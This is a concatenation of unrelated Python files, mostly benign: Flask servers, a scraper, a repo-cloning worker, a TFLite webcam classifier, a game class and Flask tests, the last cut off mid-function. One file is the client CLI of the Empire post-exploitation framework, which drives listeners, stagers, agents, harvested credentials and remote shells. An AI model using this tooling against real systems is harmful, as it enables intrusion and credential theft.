web.py
|
from flask import Flask
from threading import Thread
app = Flask('WEB')
@app.route('/')
def home():
return "I am Discord Bot and I'm vibing to Inception"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
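A minimal consumer sketch for web.py's keep_alive(): the Flask probe runs in a background thread while the bot blocks the main thread. The discord.py client and the TOKEN environment variable are assumptions for illustration, not part of the original row.

```python
# Hypothetical bot entry point; discord.py and the TOKEN env var are
# assumptions for illustration only.
import os
import discord
from web import keep_alive

client = discord.Client(intents=discord.Intents.default())

@client.event
async def on_ready():
    print(f'Logged in as {client.user}')

keep_alive()                     # start the Flask probe on port 8080
client.run(os.environ['TOKEN'])  # the bot keeps the main thread alive
```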
cloner.py
|
import os
import sys
import time
import signal
import multiprocessing
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(PROJECT_PATH, '..', '..'))
from pygithub3 import Github
import src.todoMelvin
from src.todoMelvin import settings, createGithubObject
from src.todoLogging import WarningLevels, log
from src.db.todoRepos import RepoQueues, Repo
from src.workers.workerStatus import WorkerStatus
import src.db.todoRedis
redis = src.db.todoRedis.connect()
def runWorker(status):
#Make this process ignore interrupt signals so they are only handled by the parent
signal.signal(signal.SIGINT, signal.SIG_IGN)
#The loop is ended externally by setting status.value to WorkerStatus.Dead
while status.value != WorkerStatus.Dead:
try:
cloneCount = redis.llen(RepoQueues.Cloning)
parseCount = redis.llen(RepoQueues.Parsing)
except:
log(WarningLevels.Fatal, "Cloning Worker unable to reach Redis")
break
if cloneCount > 0 and parseCount < int(settings.maxParseQueueCount):
repoKey = redis.lpop(RepoQueues.Cloning)
repo = Repo()
repo.loadFromKey(repoKey)
#sanity check our loaded key
assert repo.key() == repoKey, "Bad repo saved in cloning Queue! Key %s not found!"%(repoKey)
#clone the repo and add it to the parse queue
src.todoMelvin.checkoutRepo(repo)
redis.rpush(RepoQueues.Parsing, repoKey)
else:
sleepTime = float(settings.clonerSleepTime)
log(WarningLevels.Debug, "Cloning Worker going to sleep...")
#Set to sleeping for faster shutdown
status.value = WorkerStatus.Sleeping
time.sleep(sleepTime)
status.value = WorkerStatus.Working
def main(argv):
src.todoLogging.logSender = "CLO%s"%(argv)
log(WarningLevels.Info, "Starting Cloning Worker.")
#async global status value that is shared with processes
status = multiprocessing.Value('i', WorkerStatus.Working)
try:
#Start the function and wait for it to end
process = multiprocessing.Process(target = runWorker, args = (status, ))
process.start()
process.join()
except (KeyboardInterrupt, SystemExit):
if status.value == WorkerStatus.Sleeping:
log(WarningLevels.Info, "Shutdown signal received while asleep. Cloning worker shutting down.")
process.terminate()
process.join()
else:
log(WarningLevels.Info, "Shutdown signal received. Allow Cloner to finish current operation.")
status.value = WorkerStatus.Dead
process.join()
log(WarningLevels.Info, "Cloning Worker has shut down.")
if __name__ == "__main__":
if len(sys.argv) > 1:
main(sys.argv[1])
else:
main("0")
|
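cloner.py depends on a WorkerStatus holder that is not shown. A minimal sketch of its assumed shape, inferred from how status.value is compared and stored in a multiprocessing.Value('i', ...):

```python
# Assumed shape of src/workers/workerStatus.py, inferred from usage.
# Plain ints so the states fit in a shared multiprocessing.Value('i', ...).
class WorkerStatus:
    Working = 0   # actively draining the cloning queue
    Sleeping = 1  # idle between polls; safe to terminate immediately
    Dead = 2      # sentinel telling the worker loop to exit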
pa_lianjia_new.py
|
import json
import threading
from selenium import webdriver
def task(url):
driver = webdriver.PhantomJS(executable_path=r'D:\phantomjs-2.1.1-windows\bin\phantomjs.exe')
driver.get(url)
loupan_list = driver.find_elements_by_xpath('//ul[@class="resblock-list-wrapper"]/li')
for loupan in loupan_list:
loupan_info = {}
loupan_name = loupan.find_element_by_xpath('.//a[@class="name "]').text.strip()
loupan_img_url = loupan.find_element_by_class_name('lj-lazy').get_attribute('data-original')
loupan_type = loupan.find_element_by_xpath('.//span[@class="resblock-type"]').text.strip()
loupan_location = loupan.find_element_by_xpath('.//div[@class="resblock-location"]/span[1]').text.strip()
loupan_area = loupan.find_element_by_xpath('.//div[@class="resblock-area"]/span').text.strip()
loupan_avg_price = loupan.find_element_by_xpath('.//div[@class="main-price"]/span[1]').text.strip() + \
loupan.find_element_by_xpath('.//div[@class="main-price"]/span[2]').text.strip()
# loupan_total_price = loupan.find_element_by_xpath('.//div[@class="resblock-price"]/div[@class="second"]').text.strip()
loupan_info["楼盘名称"] = loupan_name
loupan_info["楼盘图片链接"] = loupan_img_url
loupan_info["类型"] = loupan_type
loupan_info["所在区域"] = loupan_location
loupan_info["户型建筑面积"] = loupan_area
loupan_info["均价"] = loupan_avg_price
data.append(loupan_info)
print('{} load over.'.format(loupan_name))
def main():
threading_list = []
for i in range(1, 3):
url = 'https://bj.fang.lianjia.com/loupan/pg{}/'.format(i)
t = threading.Thread(target=task, args=(url,))
threading_list.append(t)
t.start()
for t in threading_list:
t.join()
with open('lianjia.txt', mode='w', encoding='utf-8') as fp:
json.dump(data, fp, ensure_ascii=False)
if __name__ == '__main__':
data = []
main()
|
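pa_lianjia_new.py targets the legacy Selenium API: PhantomJS support was removed in Selenium 4, as were the find_element(s)_by_* helpers. A sketch of the equivalent setup on current Selenium, assuming chromedriver is on PATH:

```python
# Selenium 4 equivalent of the PhantomJS setup above (chromedriver on
# PATH is an assumption).
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By

options = Options()
options.add_argument('--headless=new')  # run Chrome without a window
driver = webdriver.Chrome(options=options)
driver.get('https://bj.fang.lianjia.com/loupan/pg1/')
loupan_list = driver.find_elements(By.XPATH, '//ul[@class="resblock-list-wrapper"]/li')
```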
main.py
|
import re
import shlex
import threading
import time
from typing import get_type_hints, Dict, List, Optional
import urllib3
from docopt import docopt
from prompt_toolkit import PromptSession, HTML
from prompt_toolkit.completion import Completer
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.patch_stdout import patch_stdout
from src.EmpireCliConfig import empire_config
from src.EmpireCliState import state
from src.MenuState import menu_state
from src.ShortcutHandler import shortcut_handler
from src.bindings import bindings
from src.menus import Menu
from src.menus.AdminMenu import admin_menu
from src.menus.AgentMenu import agent_menu
from src.menus.ChatMenu import chat_menu
from src.menus.CredentialMenu import credential_menu
from src.menus.InteractMenu import interact_menu
from src.menus.ListenerMenu import listener_menu
from src.menus.MainMenu import main_menu
from src.menus.PluginMenu import plugin_menu
from src.menus.ShellMenu import shell_menu
from src.menus.UseListenerMenu import use_listener_menu
from src.menus.UseModuleMenu import use_module_menu
from src.menus.UsePluginMenu import use_plugin_menu
from src.menus.UseStagerMenu import use_stager_menu
from src.utils import print_util
class MyCustomCompleter(Completer):
def __init__(self, empire_cli):
self.empire_cli = empire_cli
def get_completions(self, document, complete_event):
word_before_cursor = document.get_word_before_cursor(WORD=True)
try:
cmd_line = list(map(lambda s: s.lower(), shlex.split(document.current_line)))
if len(cmd_line) == 0:
cmd_line.append('')
except ValueError:
pass
else:
if not state.connected:
yield from self.empire_cli.menus['MainMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
# These commands should be accessible anywhere.
elif cmd_line[0] in ['uselistener']:
yield from self.empire_cli.menus['UseListenerMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
elif cmd_line[0] in ['usestager']:
yield from self.empire_cli.menus['UseStagerMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
elif cmd_line[0] in ['usemodule']:
yield from self.empire_cli.menus['UseModuleMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
elif cmd_line[0] in ['interact']:
yield from self.empire_cli.menus['InteractMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
elif cmd_line[0] in ['useplugin']:
yield from self.empire_cli.menus['UsePluginMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
else:
# Menu specific commands
yield from menu_state.current_menu.get_completions(document, complete_event, cmd_line,
word_before_cursor)
class CliExitException(BaseException):
pass
class EmpireCli(object):
def __init__(self) -> None:
self.completer = MyCustomCompleter(self)
self.menus: Dict[str, Menu] = {
'MainMenu': main_menu,
'ListenerMenu': listener_menu,
'UseListenerMenu': use_listener_menu,
'UseStagerMenu': use_stager_menu,
'AgentMenu': agent_menu,
'UseModuleMenu': use_module_menu,
'InteractMenu': interact_menu,
'ShellMenu': shell_menu,
'CredentialMenu': credential_menu,
'PluginMenu': plugin_menu,
'UsePluginMenu': use_plugin_menu,
'AdminMenu': admin_menu,
'ChatMenu': chat_menu
}
for menu in self.menus.values():
state.register_menu(menu)
@staticmethod
def bottom_toolbar():
if state.connected:
return HTML(f'Connected to {state.host}:{state.port}. {len(state.agents)} agents. {len(chat_menu.chat_cache)} unread messages.')
else:
return ''
@staticmethod
def strip(options):
return {re.sub('[^A-Za-z0-9 _]+', '', k): v for k, v in options.items()}
@staticmethod
def get_autoconnect_server() -> Optional[str]:
"""
Looks for a server in the yaml marked for autoconnect.
If one is not found, returns None
:return: the name of the server to autoconnect
"""
servers = empire_config.yaml.get('servers', {})
autoserver = list(filter(lambda x: x[1].get('autoconnect') is True, servers.items()))
if len(autoserver) > 0:
return autoserver[0][0]
return None
@staticmethod
def update_in_bg(session: PromptSession):
while True:
time.sleep(2)
session.message = HTML(menu_state.current_menu.get_prompt())
session.app.invalidate()
def main(self):
if empire_config.yaml.get('suppress-self-cert-warning', True):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Create some history first. (Easy for testing.)
history = InMemoryHistory()
history.append_string("help")
history.append_string('uselistener http')
history.append_string('listeners')
history.append_string("main")
history.append_string("connect -c localhost")
print_util.loading()
print("\n")
print("Use the 'connect' command to connect to your Empire server.")
print("'connect -c localhost' will connect to a local empire instance with all the defaults")
print("including the default username and password.")
session = PromptSession(
key_bindings=bindings,
history=history,
# auto_suggest=AutoSuggestFromHistory(),
# enable_history_search=True,
completer=self.completer,
complete_in_thread=True,
# complete_while_typing=True,
bottom_toolbar=self.bottom_toolbar,
# swap_light_and_dark_colors=True,
# mouse_support=True
)
t = threading.Thread(target=self.update_in_bg, args=[session])
t.daemon = True
t.start()
autoserver = self.get_autoconnect_server()
if autoserver:
print(print_util.color(f'[*] Attempting to connect to server: {autoserver}'))
self.menus['MainMenu'].connect(autoserver, config=True)
if empire_config.yaml.get('resource-file'):
with open(empire_config.yaml.get('resource-file')) as resource_file:
print(print_util.color(f"[*] Executing Resource File: {empire_config.yaml.get('resource-file')}"))
for cmd in resource_file:
with patch_stdout():
try:
time.sleep(1)
text = session.prompt(accept_default=True, default=cmd.strip())
cmd_line = list(shlex.split(text))
self.parse_command_line(text, cmd_line)
except Exception as e:
print(print_util.color(f'[*] Error parsing resource command: {cmd.strip()}'))
while True:
try:
with patch_stdout():
text = session.prompt(HTML(menu_state.current_menu.get_prompt()), refresh_interval=None)
# cmd_line = list(map(lambda s: s.lower(), shlex.split(text)))
# TODO what to do about case sensitivity for parsing options.
cmd_line = list(shlex.split(text))
self.parse_command_line(text, cmd_line)
except KeyboardInterrupt:
print(print_util.color("[!] Type exit to quit"))
except EOFError:
break # Control-D pressed.
except CliExitException:
break
def parse_command_line(self, text: str, cmd_line: List[str]):
if len(cmd_line) == 0:
return
if not state.connected and not cmd_line[0] == 'connect':
if cmd_line[0] == 'exit':
choice = input(print_util.color("[>] Exit? [y/N] ", "red"))
if choice.lower() == "y":
raise CliExitException
else:
return
else:
return
# Switch Menus
if text == 'main':
print_util.title(state.empire_version, len(state.modules), len(state.listeners), len(state.agents))
menu_state.push(self.menus['MainMenu'])
elif text == 'listeners':
menu_state.push(self.menus['ListenerMenu'])
elif text == 'chat':
menu_state.push(self.menus['ChatMenu'])
elif menu_state.current_menu_name == 'ChatMenu':
menu_state.current_menu.send_chat(text)
elif text == 'agents':
menu_state.push(self.menus['AgentMenu'])
elif text == 'credentials':
menu_state.push(self.menus['CredentialMenu'])
elif text == 'plugins':
menu_state.push(self.menus['PluginMenu'])
elif text == 'admin':
menu_state.push(self.menus['AdminMenu'])
elif cmd_line[0] == 'uselistener' and len(cmd_line) > 1:
if cmd_line[1] in state.listener_types:
menu_state.push(self.menus['UseListenerMenu'], selected=cmd_line[1])
else:
print(f'No listener {cmd_line[1]}')
elif cmd_line[0] == 'usestager' and len(cmd_line) > 1:
if cmd_line[1] in state.stagers:
menu_state.push(self.menus['UseStagerMenu'], selected=cmd_line[1])
else:
print(f'No stager {cmd_line[1]}')
elif cmd_line[0] == 'interact' and len(cmd_line) > 1:
if cmd_line[1] in state.agents:
menu_state.push(self.menus['InteractMenu'], selected=cmd_line[1])
else:
print(f'No agent {cmd_line[1]}')
elif cmd_line[0] == 'useplugin' and len(cmd_line) > 1:
if cmd_line[1] in state.plugins:
menu_state.push(self.menus['UsePluginMenu'], selected=cmd_line[1])
else:
print(f'No plugin {cmd_line[1]}')
elif cmd_line[0] == 'usemodule' and len(cmd_line) > 1:
if cmd_line[1] in state.modules:
if menu_state.current_menu_name == 'InteractMenu':
menu_state.push(self.menus['UseModuleMenu'], selected=cmd_line[1],
agent=menu_state.current_menu.selected)
else:
menu_state.push(self.menus['UseModuleMenu'], selected=cmd_line[1])
else:
print(f'No module {cmd_line[1]}')
elif text == 'shell':
if menu_state.current_menu_name == 'InteractMenu':
menu_state.push(self.menus['ShellMenu'], selected=menu_state.current_menu.selected)
else:
pass
elif menu_state.current_menu_name == 'ShellMenu':
if text == 'exit':
menu_state.push(self.menus['InteractMenu'], selected=menu_state.current_menu.selected)
else:
menu_state.current_menu.shell(menu_state.current_menu.selected, text)
elif cmd_line[0] == 'report':
if len(cmd_line) > 1:
state.generate_report(cmd_line[1])
else:
state.generate_report('')
elif text == 'back':
menu_state.pop()
elif text == 'exit':
choice = input(print_util.color("[>] Exit? [y/N] ", "red"))
if choice.lower() == "y":
raise CliExitException
else:
pass
else:
func = None
try:
func = getattr(menu_state.current_menu if hasattr(menu_state.current_menu, cmd_line[0]) else self, cmd_line[0])
except:
pass
if func:
try:
args = self.strip(docopt(
func.__doc__,
argv=cmd_line[1:]
))
new_args = {}
# todo casting for type hinted values?
for key, hint in get_type_hints(func).items():
# if args.get(key) is not None:
if key != 'return':
new_args[key] = args[key]
# print(new_args)
func(**new_args)
except Exception as e:
print(e)
pass
except SystemExit as e:
pass
elif not func and menu_state.current_menu_name == 'InteractMenu':
if cmd_line[0] in shortcut_handler.get_names(self.menus['InteractMenu'].agent_language):
menu_state.current_menu.execute_shortcut(cmd_line[0], cmd_line[1:])
if __name__ == "__main__":
try:
empire = EmpireCli()
empire.main()
finally:
state.shutdown()
|
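The fall-through branch of parse_command_line resolves cmd_line[0] to a method on the current menu, feeds that method's docstring to docopt, and forwards the options named in its type hints as keyword arguments. A hypothetical menu command showing the contract (the command name and its argument are invented for illustration):

```python
# Hypothetical menu method: docopt parses the Usage: block in the
# docstring, EmpireCli.strip() reduces '<agent_name>' to 'agent_name',
# and the str type hint routes that value into the keyword argument.
def kill(self, agent_name: str) -> None:
    """
    Kill the selected agent.

    Usage: kill <agent_name>
    """
    print(f'Killing agent {agent_name}')
```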
http_server.py
|
import os
import socketserver
import time
import traceback
from http.server import BaseHTTPRequestHandler
from pathlib import Path
from socket import socket, AF_INET, SOCK_DGRAM
from threading import Thread, Timer
def serve_file(filename, content_type=None):
"""
Create an http server on a random port to serve a file.
The file can be downloaded only one time. After 1 minutes the server is stoped
filename: string The file path or file content
content_type: the file content-type
"""
class FileHandler(BaseHTTPRequestHandler):
def do_GET(self): # noqa
try:
self.send_response(200)
self.send_header("Content-type", content_type)
self.send_header("Access-Control-Allow-Origin", "*")
if os.path.exists(str(filename)):
mediapath = Path(filename)
length = mediapath.stat().st_size
mtime = mediapath.stat().st_mtime
self.send_header("Content-Length", length)
self.send_header("Last-Modified", time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(mtime)))
#Headers must be completed before any body bytes are written
self.end_headers()
with open(str(mediapath), "rb") as mediafile:
while True:
data = mediafile.read(100 * 1024)
if not data:
break
self.wfile.write(data)
else:
#filename holds the raw content here; wfile expects bytes
body = filename if isinstance(filename, bytes) else str(filename).encode()
self.send_header("Content-Length", len(body))
self.send_header("Last-Modified", time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()))
self.end_headers()
self.wfile.write(body)
except: # noqa
traceback.print_exc()
tthToStopServer.cancel()
stopServer(httpd)
def startServer(httpd):
httpd.serve_forever()
httpd.server_close()
def stopServer(httpd):
Thread(target=httpd.shutdown).start()
if content_type is None:
content_type = "video/mp4"
httpd = socketserver.TCPServer(("0.0.0.0", 0), FileHandler)
Thread(target=startServer, args=[httpd]).start()
tthToStopServer = Timer(60.0, stopServer, args=[httpd])
tthToStopServer.start()
s = socket(AF_INET, SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
local_ip = s.getsockname()[0]
s.close()
(host, port) = httpd.server_address
return "http://" + local_ip + ":" + str(port)
|
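A minimal usage sketch (the media path is an assumption): the returned URL has no path component, since FileHandler answers any GET with the file, and the Timer tears the server down after roughly a minute.

```python
# Hypothetical call; any GET against the returned base URL streams the
# file once, and the server stops itself after ~60 seconds.
url = serve_file('/tmp/clip.mp4', content_type='video/mp4')
print(f'Download available for about a minute at {url}')
```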
detector.py
|
from threading import Thread
import collections
import tensorflow as tf
import numpy as np
import cv2
class Detector:
def __init__(self, model_path, label_path):
self.running = True
self.camera = cv2.VideoCapture(0)
self.results = collections.deque(maxlen=10)
self.interpreter = tf.lite.Interpreter(model_path=model_path)
self.interpreter.allocate_tensors()
self.input_details = self.interpreter.get_input_details()
self.output_details = self.interpreter.get_output_details()
self.target_height = self.input_details[0]['shape'][1]
self.target_width = self.input_details[0]['shape'][2]
self.classes = {}
with open(label_path, 'r') as f:
for line in f.readlines():
pair = line.strip().split(maxsplit=1)
self.classes[int(pair[0])] = pair[1].strip()
def start(self):
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
def update(self):
while self.running:
ret, frame = self.camera.read()
if not ret:
continue
frame = cv2.flip(frame, 1)
input_data = self.preprocess_image(frame)
detection = self.predict(input_data)
frame = self.draw_detection(frame, detection)
self.results.append(np.argmax(detection[0]))
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
self.camera.release()
cv2.destroyAllWindows()
def stop(self):
self.running = False
def preprocess_image(self, frame):
resized = cv2.resize(frame, (self.target_width, self.target_height))
rgb = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)
normalized = (np.float32(rgb) - 127.5) / 127.5
input_data = np.expand_dims(normalized, axis=0)
return input_data
def predict(self, input_data):
self.interpreter.set_tensor(self.input_details[0]['index'],
input_data)
self.interpreter.invoke()
detection = self.interpreter.get_tensor(self.output_details[0]['index'])
return detection
def draw_detection(self, frame, detection):
for i, s in enumerate(detection[0]):
tag = f'{self.classes[i]}: {s*100:.2f}%'
cv2.putText(frame, tag, (10, 20 + 20 * i),
cv2.FONT_HERSHEY_SIMPLEX,
0.7, (0, 255, 0), 1)
return frame
def get_result(self):
if len(self.results) == 0:
return 0
counter = collections.Counter(self.results)
result = counter.most_common()[0][0]
return result
if __name__ == '__main__':
import time
d = Detector('model_unquant.tflite', 'labels.txt')
d.start()
for i in range(20):
print(i, d.get_result())
time.sleep(1)
d.stop()
|
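Detector.__init__ parses the label file as one "index name" pair per line, the two-column layout produced by common TFLite export tools. A hypothetical labels.txt:

```
0 class_a
1 class_b
2 class_c
```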
arbusto.py
|
'''
Created on Apr 28, 2020
@author: leonardo
Content: Arbusto (bush) class
'''
from componentes.jogo.objetos_estaticos import ObjetosEstaticos
import random
from componentes.jogo.distancia_bomba import DistanciaBomba
from componentes.jogo.multi_bomba import MultiBomba
from componentes.jogo.raio_bomba import RaioBomba
from componentes.jogo.velocidade import Velocidade
import time
from threading import Thread
class Arbusto(ObjetosEstaticos):
def destruir(self, personagem):
#Pick a power-up
objeto = self.is_power()
if objeto is not None:
print("Applying the power")
objeto.poder(personagem)
#Delete the object that was used to apply the power
del objeto
personagem.servidor.remove(self.oid)
respawn = Thread(target=self.re_spawn, args=(personagem,))
respawn.start()
#These two functions could become one, but we need to pass the id of where the power goes...
def is_power(self):
r = random.randint(0, 5)
#Switch implemented with a dictionary
switcher = {
0: Velocidade(),
1: RaioBomba(),
2: DistanciaBomba(),
3: MultiBomba()
}
#Choose which power-up will be used
if r <= 3:
return switcher.get(r)
else:
return None
def re_spawn(self, personagem):
time.sleep(15)
personagem.servidor.respawn(self)
|
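A design note on is_power: the dictionary switch above instantiates all four power-ups just to pick one. A lazier sketch under the same constructors, storing classes instead of instances:

```python
# Store the classes, not instances, so only the chosen power-up is built.
switcher = {0: Velocidade, 1: RaioBomba, 2: DistanciaBomba, 3: MultiBomba}
cls = switcher.get(r)       # r comes from random.randint(0, 5)
objeto = cls() if cls is not None else None
```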
test_basic.py
|
# -*- coding: utf-8 -*-
"""
tests.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
import re
import sys
import time
import uuid
from datetime import datetime
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest, Forbidden, NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
from flask._compat import text_type
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
# Older versions of Werkzeug.test.Client don't have an options method
if hasattr(client, "options"):
rv = client.options("/")
else:
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
if hasattr(client, "options"):
rv = client.options("/more")
else:
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
# Issue 1288: Test that automatic options are not added when non-uppercase 'options' in methods
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert '"localhost" is not a valid cookie domain' in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return text_type(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
